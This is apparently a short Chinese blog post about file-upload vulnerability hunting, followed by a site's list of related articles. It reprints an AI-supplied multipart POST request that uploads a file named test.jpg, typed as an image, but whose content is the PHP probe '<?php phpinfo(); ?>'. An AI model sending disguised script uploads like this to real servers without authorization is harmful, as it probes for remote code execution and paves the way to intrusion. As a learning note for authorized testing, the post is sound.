文件上传漏洞请求体

前言:

本文仅用于学习交流,请仔细阅读网络安全法,切勿用于违法犯罪等行为,违者与作者无关

在寻找漏洞时,就是看到了目录为405的页面,但是我要伪造post请求的数据包,没找到,然后我就去问ai了

内容:

这也是非常有意思的,刚刚才发现,其实我是问了ai才知道的,有点晚了,还好吧

ai回答

复制代码
POST /upload HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg

<?php phpinfo(); ?>
<binary content of test.jpg>
------WebKitFormBoundary7MA4YWxkTrZu0gW--

注意上传只需要上传phpinfo就好了,大多数src不允许上传后门文件

<?php phpinfo(); ?>

虽然啥也没有挖到,但是发现了新的事情也是很不错的

相关推荐
virelin_Y.lin42 分钟前
系统与网络安全------网络通信原理(5)
网络·安全·web安全·udp·tcp·传输层
刘哥测评技术zcwz6262 小时前
美客多自养号测评技术解析:如何低成本打造安全稳定的测评体系
服务器·网络·经验分享·安全
Arkmornings2 小时前
安全人员如何对漏洞进行定级?
网络·安全·web安全
jinan8863 小时前
敏感数据触发后怎么保障安全?
大数据·网络·安全·web安全·金融
码银3 小时前
案例 - 登录认证:保障系统安全访问的实现
安全·系统安全
麻芝汤圆3 小时前
Hadoop:大数据时代的基石
大数据·linux·hadoop·分布式·安全·web安全·centos
阿里云云原生5 小时前
阿里云 MSE Nacos 发布全新“安全防护”模块,简化安全配置,提升数据保护
网络·安全·阿里云
newxtc7 小时前
【北交互联-注册/登录安全分析报告】
人工智能·安全·网易易盾·政务·极验
神经毒素7 小时前
WEB安全--蓝队日志--RCE数据包分析
安全·web安全
开发者工具分享7 小时前
项目后期发现重大漏洞,如何紧急修复
网络·安全·web安全